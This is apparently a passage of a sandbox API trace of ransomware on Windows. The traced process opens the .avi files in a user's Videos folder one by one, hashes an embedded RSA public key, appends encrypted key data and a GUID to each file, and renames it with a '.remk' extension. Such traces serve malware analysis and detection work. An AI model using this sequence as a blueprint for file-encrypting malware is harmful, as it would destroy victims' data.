nFileSizeLow=0xa83e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2yWm8WTEQIQtOzFejH.avi", cAlternateFileName="2YWM8W~1.AVI")) returned 1 [0236.962] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6768 [0236.962] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xee) returned 0x31a4298 [0236.962] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\_2KhhEZ4Uf5pHRY\\2yWm8WTEQIQtOzFejH.avi") returned=".avi" [0236.962] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\_2KhhEZ4Uf5pHRY\\2yWm8WTEQIQtOzFejH.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\_2khhez4uf5phry\\2ywm8wteqiqtozfejh.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0236.962] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=43070) returned 1 [0236.962] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0236.965] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xa818, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.965] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0236.966] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0236.966] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xa83e, lpOverlapped=0x0) returned 1 [0236.967] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.967] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0236.967] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.967] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.967] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694f48) returned 1 [0236.968] CryptCreateHash (in: hProv=0x694f48, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0236.968] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0236.968] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0236.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0236.969] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0236.969] GetLastError () returned 0x0 [0236.969] CryptDestroyHash (hHash=0x31de170) returned 1 [0236.969] CryptReleaseContext (hProv=0x694f48, dwFlags=0x0) returned 1 [0236.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0236.969] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0236.969] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0236.969] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0236.969] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0236.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.969] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0236.969] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa840) returned 0x37cf820 [0236.969] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0236.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0236.969] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0236.970] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0236.970] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0236.970] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0236.970] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cf0f0 [0236.970] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc900 [0236.970] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cf138 [0236.970] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc918 [0236.970] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc948 [0236.970] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc9a8 [0236.970] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc960 [0236.970] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0236.970] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0236.970] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0236.970] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0236.970] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc948 | out: hHeap=0x630000) returned 1 [0236.970] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc960 | out: hHeap=0x630000) returned 1 [0236.970] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc9a8 | out: hHeap=0x630000) returned 1 [0236.970] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0236.970] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.970] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc9a8 [0236.970] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0236.970] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc960 [0236.970] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0236.970] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x37bc948 [0236.970] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0236.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0236.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0236.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0236.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0236.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0236.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0236.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0236.971] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0236.971] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc960 | out: hHeap=0x630000) returned 1 [0236.971] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0236.971] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc948 | out: hHeap=0x630000) returned 1 [0236.971] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0236.971] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0236.971] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc9a8 | out: hHeap=0x630000) returned 1 [0236.971] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0236.971] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0236.971] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1db0 | out: hHeap=0x630000) returned 1 [0236.971] GetCurrentThreadId () returned 0x314 [0236.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0236.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c6680 [0236.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0236.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694f48 [0236.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0236.972] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0236.972] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0236.972] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0236.972] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.972] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.972] GetCurrentThreadId () returned 0x314 [0236.972] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.972] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.972] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0236.972] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.972] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.972] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.972] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.972] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0236.972] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0236.972] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0236.972] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0236.972] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0236.972] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0236.972] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0236.972] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc9a8 [0236.972] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0236.973] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xa83e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.973] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0236.973] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0236.973] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.973] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0236.973] CloseHandle (hObject=0x640) returned 1 [0236.975] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\_2KhhEZ4Uf5pHRY\\2yWm8WTEQIQtOzFejH.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\_2khhez4uf5phry\\2ywm8wteqiqtozfejh.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\_2KhhEZ4Uf5pHRY\\2yWm8WTEQIQtOzFejH.avi.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\_2khhez4uf5phry\\2ywm8wteqiqtozfejh.avi.remk")) returned 1 [0236.976] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0236.976] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.976] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.978] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0236.978] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xebfcdef0, ftCreationTime.dwHighDateTime=0x1d5db67, ftLastAccessTime.dwLowDateTime=0x54860dd0, ftLastAccessTime.dwHighDateTime=0x1d5e15c, ftLastWriteTime.dwLowDateTime=0x54860dd0, ftLastWriteTime.dwHighDateTime=0x1d5e15c, nFileSizeHigh=0x0, nFileSizeLow=0xbaf9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nXQHuyqoJra2B.avi", cAlternateFileName="NXQHUY~1.AVI")) returned 1 [0236.978] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\_2KhhEZ4Uf5pHRY\\nXQHuyqoJra2B.avi") returned=".avi" [0236.978] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\_2KhhEZ4Uf5pHRY\\nXQHuyqoJra2B.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\_2khhez4uf5phry\\nxqhuyqojra2b.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0236.978] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=47865) returned 1 [0236.978] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0236.981] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xbad3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.981] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0237.004] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xbaf9, lpOverlapped=0x0) returned 1 [0237.006] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0237.006] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0237.006] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0237.006] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694f48) returned 1 [0237.007] CryptCreateHash (in: hProv=0x694f48, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0237.007] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0237.007] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0237.007] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0237.007] GetLastError () returned 0x0 [0237.007] CryptDestroyHash (hHash=0x31de170) returned 1 [0237.007] CryptReleaseContext (hProv=0x694f48, dwFlags=0x0) returned 1 [0237.007] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0237.007] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0237.008] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0237.008] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0237.008] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0237.008] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0237.008] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0237.008] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc960 | out: hHeap=0x630000) returned 1 [0237.008] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc978 | out: hHeap=0x630000) returned 1 [0237.008] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc9c0 | out: hHeap=0x630000) returned 1 [0237.008] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0237.008] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0237.008] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc9c0 [0237.008] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0237.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc978 [0237.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0237.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x37bc960 [0237.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0237.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0237.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0237.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0237.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0237.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0237.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0237.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0237.009] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0237.009] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc978 | out: hHeap=0x630000) returned 1 [0237.009] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0237.009] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc960 | out: hHeap=0x630000) returned 1 [0237.009] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0237.009] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0237.009] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc9c0 | out: hHeap=0x630000) returned 1 [0237.009] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0237.009] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0237.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1db0 | out: hHeap=0x630000) returned 1 [0237.010] GetCurrentThreadId () returned 0x314 [0237.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0237.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c6710 [0237.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0237.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694f48 [0237.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0237.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 